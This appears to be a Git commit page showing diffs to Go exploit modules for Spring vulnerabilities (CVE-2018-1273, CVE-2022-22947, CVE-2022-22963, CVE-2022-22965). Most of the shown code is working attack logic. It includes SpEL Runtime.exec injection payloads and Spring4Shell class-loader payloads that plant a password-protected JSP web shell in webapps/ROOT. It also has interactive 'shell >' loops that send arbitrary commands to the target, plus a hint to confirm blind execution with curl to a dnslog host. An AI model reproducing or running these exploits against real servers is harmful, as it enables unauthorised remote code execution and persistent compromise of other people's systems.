v1.0.2

sspsec · Mar 11, 2024 · 427e47c · 427e47c
1 parent e1224c0
commit 427e47c
Show file tree

Hide file tree

Showing 5 changed files with 158 additions and 225 deletions.
diff --git a/common/exp/CVE_2018_1273.go b/common/exp/CVE_2018_1273.go
@@ -96,7 +96,7 @@ func CVE_2018_1273(url string) {
 
 		}
 	} else {
-		color.Yellow("[-] 未发现CVE-2018-1273远程命令执行漏洞\n")
+		color.Yellow("[-] %s 未发现CVE-2018-1273远程命令执行漏洞\n", url)
 	}
 
 }
diff --git a/common/exp/CVE_2022_22947.go b/common/exp/CVE_2022_22947.go
@@ -47,7 +47,7 @@ func CVE_2022_22947(url string) {
               "id": "hacktest",
               "filters": [{
                 "name": "AddResponseHeader",
-                "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
+                "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream()))}"}
                 }],
               "uri": "http://example.com",
               "order": 0
@@ -129,7 +129,6 @@ func CVE_2022_22947(url string) {
 			fmt.Print("shell > ")
 			Cmd, _ = reader.ReadString('\n')
 			Cmd = strings.TrimSpace(Cmd)
-			//Cmd = strings.Replace(Cmd, " ", "+", -1)
 			if Cmd == "exit" {
 				req4, err := http.NewRequest("DELETE", urltest, nil)
 				if err != nil {
@@ -185,7 +184,6 @@ func CVE_2022_22947(url string) {
 					fmt.Println("Error reading response:", err)
 					return
 				}
-
 				res := common.ExtractResult(string(body), `s*'([^']*)'`)
 				result := strings.Replace(res, "\\n", "\n", -1)
 				fmt.Println(result)

diff --git a/common/exp/CVE_2022_22963.go b/common/exp/CVE_2022_22963.go
@@ -1,59 +1,105 @@
 package exppackage
 
 import (
+	"bufio"
+	"crypto/tls"
 	"fmt"
 	"github.com/fatih/color"
-	"io/ioutil"
-	"net/http"
+	"net"
+	"net/url"
+	"os"
 	"ssp/common"
 	"strings"
-	"time"
 )
 
-func CVE_2022_22963(url string) {
-	payload := `T(java.lang.Runtime).getRuntime().exec("id")`
-	data := "test"
-	header := map[string]string{
-		"spring.cloud.function.routing-expression": payload,
-		"Accept-Encoding":                          "gzip, deflate",
-		"Accept":                                   "*/*",
-		"Accept-Language":                          "en",
-		"User-Agent":                               common.GetRandomUserAgent(),
-		"Content-Type":                             "application/x-www-form-urlencoded",
+func CVE_2022_22963(targetURL string) {
+	parsedURL, err := url.Parse(targetURL)
+	if err != nil {
+		fmt.Println("URL parsing error:", err)
 	}
-	path := "functionRouter"
 
-	client := &http.Client{
-		Timeout: 6 * time.Second,
+	requestHeaders := []string{
+		fmt.Sprintf("POST %s HTTP/1.1", "/functionRouter"),
+		fmt.Sprintf("Host: %s", parsedURL.Host),
+		"Accept-Encoding: gzip, deflate",
+		"Accept: */*",
+		"Accept-Language: en",
+		"User-Agent: Go-http-client/1.1",
+		"Content-Type: application/x-www-form-urlencoded",
+		"spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"whoami\")",
+		"Connection: close",
+		"",
+		"",
 	}
 
-	urltest := url + path
-	req, err := http.NewRequest("POST", urltest, strings.NewReader(data))
-	if err != nil {
-		fmt.Println("Error creating request:", err)
-		return
+	var conn net.Conn
+	if parsedURL.Scheme == "https" {
+		conn, err = tls.Dial("tcp", parsedURL.Host, &tls.Config{InsecureSkipVerify: true})
+	} else {
+		conn, err = net.Dial("tcp", parsedURL.Host)
 	}
-
-	for key, value := range header {
-		req.Header.Set(key, value)
+	if err != nil {
+		fmt.Println("Connection error:", err)
 	}
+	defer conn.Close()
 
-	resp, err := client.Do(req)
+	request := strings.Join(requestHeaders, "\r\n")
+	_, err = conn.Write([]byte(request))
 	if err != nil {
-		color.Yellow("[-] URL为：%s，的目标积极拒绝请求，予以跳过\n", url)
-		return
+		fmt.Println("Failed to send request:", err)
 	}
-	defer resp.Body.Close()
 
-	body, err := ioutil.ReadAll(resp.Body)
+	response, err := bufio.NewReader(conn).ReadString('\n')
 	if err != nil {
-		fmt.Println("Error reading response:", err)
-		return
+		fmt.Println("Failed to read response:", err)
 	}
 
-	if resp.StatusCode == 500 && strings.Contains(string(body), `"error":"Internal Server Error"`) {
-		common.PrintVulnerabilityConfirmation("CVE-2022-22963", url, "存在漏洞，由于该漏洞无回显，请用Dnslog进行测试", "4")
+	if strings.Contains(response, "500 Internal Server Error") {
+		common.PrintVulnerabilityConfirmation("CVE-2022-22963", targetURL, "存在漏洞，由于该漏洞无回显，请用Dnslog进行测试,shell中输入curl xxx.dnslog.cn", "4")
+		common.Vulnum++
+		for {
+			var Cmd string
+			reader := bufio.NewReader(os.Stdin)
+
+			fmt.Print("shell > ")
+			Cmd, _ = reader.ReadString('\n')
+			Cmd = strings.TrimSpace(Cmd)
+			if Cmd == "exit" {
+				os.Exit(0)
+			}
+			requestHeaders = []string{
+				fmt.Sprintf("POST %s HTTP/1.1", "/functionRouter"),
+				fmt.Sprintf("Host: %s", parsedURL.Host),
+				"Accept-Encoding: gzip, deflate",
+				"Accept: */*",
+				"Accept-Language: en",
+				"User-Agent: Go-http-client/1.1",
+				"Content-Type: application/x-www-form-urlencoded",
+				fmt.Sprintf("spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"%s\")", Cmd),
+				"Connection: close",
+				"",
+				"",
+			}
+
+			if parsedURL.Scheme == "https" {
+				conn, err = tls.Dial("tcp", parsedURL.Host, &tls.Config{InsecureSkipVerify: true})
+			} else {
+				conn, err = net.Dial("tcp", parsedURL.Host)
+			}
+			if err != nil {
+				fmt.Println("Connection error:", err)
+			}
+			defer conn.Close()
+
+			request := strings.Join(requestHeaders, "\r\n")
+			_, err = conn.Write([]byte(request))
+			if err != nil {
+				fmt.Println("Failed to send request:", err)
+			}
+			color.Red("Payload 已打出，请到Dnslog平台查看结果\n")
+		}
 	} else {
-		color.Yellow("[-] %s 未发现CVE-2022-22963远程命令执行漏洞\n", url)
+		color.Yellow("[-] %s 未发现CVE-2022-22963远程命令执行漏洞\n", targetURL)
 	}
+
 }
diff --git a/common/exp/CVE_2022_22965.go b/common/exp/CVE_2022_22965.go
@@ -2,6 +2,7 @@ package exppackage
 
 import (
 	"bufio"
+	"bytes"
 	"fmt"
 	"github.com/dlclark/regexp2"
 	"github.com/fatih/color"
@@ -14,142 +15,58 @@ import (
 )
 
 func CVE_2022_22965(url string) {
-	oldHeaders1 := map[string]string{
-		"User-Agent": common.GetRandomUserAgent(),
-		"prefix":     "<%",
-		"suffix":     "%>//",
-		"c":          "Runtime",
-		"c1":         "Runtime",
-		"c2":         "<%",
-		"DNT":        "1",
-	}
-
-	oldHeaders2 := map[string]string{
+	Headers_1 := map[string]string{
 		"User-Agent":   common.GetRandomUserAgent(),
+		"suffix":       "%>//",
+		"c1":           "Runtime",
+		"c2":           "<%",
+		"DNT":          "1",
 		"Content-Type": "application/x-www-form-urlencoded",
 	}
 
-	headers1 := common.MergeHeaders(oldHeaders1)
-	headers2 := common.MergeHeaders(oldHeaders2)
-
-	payloadLinux := `class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22tomcat%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=`
-
-	payloadWin := `class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22tomcat%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=`
+	payload_linux := "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22tomcat%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
+	payload_win := "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22tomcat%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
+	payload_http := "?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22tomcat%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
 
-	payloadHTTP := `?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=`
+	data1 := payload_linux
+	data2 := payload_win
+	getpayload := url + payload_http
 
-	payloadOther := `class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=`
-
-	fileDateData := "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
-
-	getPayload := url + payloadHTTP
-
-	client := &http.Client{
-		Timeout: 6 * time.Second,
-	}
-
-	req, err := http.NewRequest("POST", url, strings.NewReader(fileDateData))
-	if err != nil {
-		fmt.Println("Error creating request:", err)
-		return
-	}
-	for key, value := range headers2 {
-		req.Header.Set(key, value)
-	}
-	resp, err := client.Do(req)
-	if err != nil {
-		color.Yellow("[-] URL为：%s，的目标积极拒绝请求，予以跳过\n", url)
-		return
-	}
-	defer resp.Body.Close()
-	time.Sleep(500 * time.Millisecond)
-
-	req, err = http.NewRequest("POST", url, strings.NewReader(payloadOther))
-	if err != nil {
-		fmt.Println("Error creating request:", err)
-		return
-	}
-	for key, value := range headers2 {
-		req.Header.Set(key, value)
-	}
-	resp, err = client.Do(req)
-	if err != nil {
-		color.Yellow("[-] URL为：%s，的目标积极拒绝请求，予以跳过\n", url)
-		return
-	}
-	defer resp.Body.Close()
-	time.Sleep(500 * time.Millisecond)
-
-	req, err = http.NewRequest("POST", url, strings.NewReader(payloadLinux))
-	if err != nil {
-		fmt.Println("Error creating request:", err)
-		return
-	}
-	for key, value := range headers1 {
-		req.Header.Set(key, value)
-	}
-	resp, err = client.Do(req)
-	if err != nil {
-		color.Yellow("[-] URL为：%s，的目标积极拒绝请求，予以跳过\n", url)
-		return
-	}
-	defer resp.Body.Close()
-	time.Sleep(500 * time.Millisecond)
-
-	req, err = http.NewRequest("POST", url, strings.NewReader(payloadWin))
-	if err != nil {
-		fmt.Println("Error creating request:", err)
-		return
-	}
-	for key, value := range headers1 {
-		req.Header.Set(key, value)
-	}
-	resp, err = client.Do(req)
-	if err != nil {
-		color.Yellow("[-] URL为：%s，的目标积极拒绝请求，予以跳过\n", url)
-		return
+	client := &http.Client{}
+	for _, payload := range []string{data1, data2} {
+		req, err := http.NewRequest("POST", url, bytes.NewBufferString(payload))
+		if err != nil {
+			fmt.Println("Error creating request:", err)
+			return
+		}
+		for key, value := range Headers_1 {
+			req.Header.Set(key, value)
+		}
+		_, err = client.Do(req)
+		if err != nil {
+			fmt.Println("Error executing request:", err)
+			return
+		}
+		time.Sleep(500 * time.Millisecond)
 	}
-	defer resp.Body.Close()
-	time.Sleep(500 * time.Millisecond)
 
-	req, err = http.NewRequest("GET", getPayload, nil)
-	if err != nil {
-		fmt.Println("Error creating request:", err)
-		return
-	}
-	for key, value := range headers1 {
-		req.Header.Set(key, value)
-	}
-	resp, err = client.Do(req)
+	_, err := http.Get(getpayload)
 	if err != nil {
-		color.Yellow("[-] URL为：%s，的目标积极拒绝请求，予以跳过\n", url)
+		fmt.Println("Error getting payload:", err)
 		return
 	}
-	defer resp.Body.Close()
 	time.Sleep(500 * time.Millisecond)
 
-	req, err = http.NewRequest("GET", url+"tomcatwar.jsp", nil)
-	if err != nil {
-		fmt.Println("Error creating request:", err)
-		return
-	}
-	for key, value := range headers1 {
-		req.Header.Set(key, value)
-	}
-	resp, err = client.Do(req)
-	if err != nil {
-		color.Yellow("[-] URL为：%s，的目标积极拒绝请求，予以跳过\n", url)
-		return
-	}
+	resp, err := http.Get(url + "tomcatwar.jsp")
+	resp, err = http.Get(url + "tomcatwar.jsp")
 
-	body, err := ioutil.ReadAll(resp.Body)
 	if err != nil {
-		fmt.Println("Error reading response:", err)
+		fmt.Println("Error checking status code:", err)
 		return
 	}
 
-	shellURL := url + "tomcatwar.jsp?pwd=j&cmd=whoami"
-	if resp.StatusCode == 200 && strings.Contains(string(body), "getRuntime().exec") {
+	shellURL := url + "tomcatwar.jsp?pwd=tomcat&cmd=whoami"
+	if resp.StatusCode == 200 {
 		common.PrintVulnerabilityConfirmation("CVE_2022_22965", url, shellURL, "5")
 		for {
 			var Cmd string
@@ -162,8 +79,8 @@ func CVE_2022_22965(url string) {
 			if Cmd == "exit" {
 				os.Exit(0)
 			}
-			urlShell := fmt.Sprintf("%stomcatwar.jsp?pwd=j&cmd=%s", url, Cmd)
-			req, err = http.NewRequest("GET", urlShell, nil)
+			urlShell := fmt.Sprintf("%stomcatwar.jsp?pwd=tomcat&cmd=%s", url, Cmd)
+			req, err := http.NewRequest("GET", urlShell, nil)
 			if err != nil {
 				fmt.Println("Error creating request:", err)
 				return
@@ -175,7 +92,7 @@ func CVE_2022_22965(url string) {
 			}
 			defer resp.Body.Close()
 			if resp != nil && resp.StatusCode == 500 {
-				color.Yellow("[-] 重发包返回状态码500，请手动尝试利用WebShell：tomcatwar.jsp?pwd=j&cmd=whoami")
+				color.Yellow("[-] 重发包返回状态码500，请手动尝试利用WebShell：tomcatwar.jsp?pwd=tomcat&cmd=whoami")
 				break
 			} else if resp != nil {
 				defer resp.Body.Close()